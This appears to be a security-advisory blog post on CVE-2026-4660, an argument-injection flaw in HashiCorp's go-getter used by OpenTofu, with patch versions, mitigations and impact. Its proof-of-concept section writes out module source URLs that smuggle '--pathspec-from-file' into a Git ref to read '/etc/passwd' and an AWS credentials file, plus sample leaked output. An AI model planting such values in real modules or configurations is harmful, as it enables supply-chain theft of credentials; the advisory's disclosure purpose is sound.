Listen to this Post
OpenTofu, an open-source infrastructure-as-code tool, relies on the `go-getter` library to download external dependencies such as providers and modules. The `go-getter` library, maintained by HashiCorp, is vulnerable to CVE-2026-4660, which affects versions up to v1.8.5. This vulnerability allows an attacker to perform arbitrary file reads on the file system during certain Git operations through a maliciously crafted URL.
The vulnerability stems from insufficient input validation within the library’s URL parsing mechanism. When processing a maliciously crafted Git URL, the `go-getter` library can be tricked into passing attacker-controlled arguments to the `git checkout` command. Specifically, an attacker can set the `ref` parameter in a Git URL to --pathspec-from-file=/path/to/file. When `go-getter` clones the repository and executes `git checkout` with this argument, Git reads the specified file line by line, treats each line as a pathspec, fails to match any files, and subsequently dumps the entire contents of the file in its error output.
This issue affects any tool that uses the vulnerable version of go-getter, including Terraform, Nomad, Packer, and Waypoint. In the context of OpenTofu, an attacker could publish a seemingly legitimate module that contains a nested submodule referencing a malicious repository with the crafted `ref` parameter. When a user runs `tofu init` to download the module, the error output from the failed `git checkout` will contain the contents of the targeted file, potentially exposing sensitive information such as AWS credentials, private keys, or API tokens.
The vulnerability exists in two code paths within go-getter: the `clone()` path, which is taken when the destination directory is absent, and the `update()` path, which is taken when it exists. Both paths call the same vulnerable `checkout()` function. OpenTofu’s module installer always removes the destination directory before invoking go-getter, which triggers the `clone()` path.
The vulnerability is fixed in `go-getter` v1.8.6. OpenTofu has addressed this issue in versions v1.11.10 and v1.12.3 by upgrading to the patched version of the library. The v1.10 series is also impacted, but upgrading the library in that series risks breaking compatibility; users are advised to plan an upgrade to v1.11.10.
DailyCVE Form
Platform: OpenTofu
Version: <1.11.10, >=1.12.0-beta1 <1.12.3
Vulnerability: Arbitrary File Read
Severity: High (CVSS 7.5)
Date: 2026-04-09
Prediction: Patch available (v1.11.10/v1.12.3)
What Undercode Say
The following analytics and commands provide insight into the vulnerability’s behavior and impact.
Vulnerable Code Path Analysis:
go-getter's clone() and update() both call checkout()
clone() path (triggered when dst is absent)
func (c GitGetter) Clone() {
// ...
if err := c.checkout(); err != nil {
os.RemoveAll(dst) Deferred removal on error
}
}
update() path (triggered when dst exists)
func (c GitGetter) Update() {
// ...
if err := c.checkout(); err != nil {
No removal, directory persists
}
}
OpenTofu Module Installer Behavior:
// initwd/module_install.go:251 // OpenTofu always removes destination before calling go-getter os.RemoveAll(dst) // This ensures the clone() path is always taken
Vulnerable Git Command Execution:
The malicious ref triggers this command git checkout --pathspec-from-file=/etc/passwd Git reads /etc/passwd and outputs its contents as error messages
PoC Repository Structure:
Attacker's top-level module (tf-aws-vpc)
module "vpc" {
source = "git::https://github.com/attacker/tf-aws-vpc.git"
}
Inside attacker's module, a submodule with malicious ref
module "internal" {
source = "git::https://github.com/attacker/tf-internal.git?ref=--pathspec-from-file=/home/runner/.aws/credentials"
}
Exploit
An attacker can exploit this vulnerability by publishing a malicious OpenTofu module on a public repository such as GitHub. The module appears legitimate and contains functional code. However, it includes a nested submodule with a `source` URL that specifies a malicious `ref` parameter:
git::https://github.com/attacker/tf-internal.git?ref=--pathspec-from-file=/path/to/target/file
When a victim includes this top-level module in their OpenTofu configuration and runs tofu init, the following occurs:
1. `go-getter` clones the top-level module.
- It discovers the nested submodule and clones the attacker-controlled repository.
3. It executes `git checkout –pathspec-from-file=/path/to/target/file`.
- Git reads the target file, fails to match any pathspec, and outputs the file’s contents line by line in the error output.
The `terraform init` or `tofu init` command fails with a module download error, but the error output contains the leaked file contents. For example, an AWS credentials file would be exposed as:│ Error: Failed to download module │ │ error: pathspec 'aws_access_key_id = AKIAIOSFODNN7EXAMPLE' did not match any file(s) known to git │ │ error: pathspec 'aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY' did not match any file(s) known to git
No `tofu apply` is required; the leak occurs during the initialization phase. This makes the vulnerability particularly dangerous in CI/CD pipelines where `tofu init` is run automatically and error logs may be captured and stored.
Protection
To protect against CVE-2026-4660, the following measures are recommended:
1. Upgrade OpenTofu: The primary mitigation is to upgrade to OpenTofu v1.11.10 or v1.12.3, which incorporate the fixed `go-getter` v1.8.6. Users on the v1.10 series should plan an upgrade to v1.11.10.
2. Upgrade go-getter: For projects that directly use go-getter, upgrade to v1.8.6 or later. The `go-getter/v2` branch is unaffected.
3. Review Module Sources: Exercise caution when selecting URLs for downloading modules and providers. Only use trusted sources for OpenTofu dependencies.
4. Monitor Error Logs: Implement monitoring and alerting for unusual error patterns in `tofu init` output, particularly errors containing pathspec failures or file contents.
5. Network Controls: Consider implementing network-level controls to restrict access to Git repositories and other external resources.
6. Dependency Scanning: Use dependency scanning tools to identify vulnerable versions of `go-getter` in your projects.
Impact
The impact of CVE-2026-4660 on OpenTofu users is significant:
– Data Exposure: An attacker can read arbitrary files on the system where `tofu init` is executed. This includes sensitive files such as:
– Cloud provider credentials (AWS, GCP, Azure)
– Private keys (SSH, TLS)
– API tokens and secrets
– Configuration files containing sensitive information
– Environment variables and deployment configurations
– Supply Chain Attack: The vulnerability can be exploited through a dependency supply chain attack. An attacker can publish a malicious module that appears legitimate, and any user who includes it in their configuration becomes vulnerable.
– CI/CD Pipeline Risk: The vulnerability is particularly dangerous in automated environments such as CI/CD pipelines, where `tofu init` is run automatically and error logs may be stored or displayed. These systems often run with elevated privileges and have access to sensitive data.
– No User Interaction Required: The attack requires no user interaction beyond running `tofu init` on a configuration that includes a malicious module. No `tofu apply` or other action is needed.
– Wide Affected Ecosystem: The vulnerability affects all tools that use the vulnerable version of go-getter, including Terraform, Nomad, Packer, and Waypoint.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
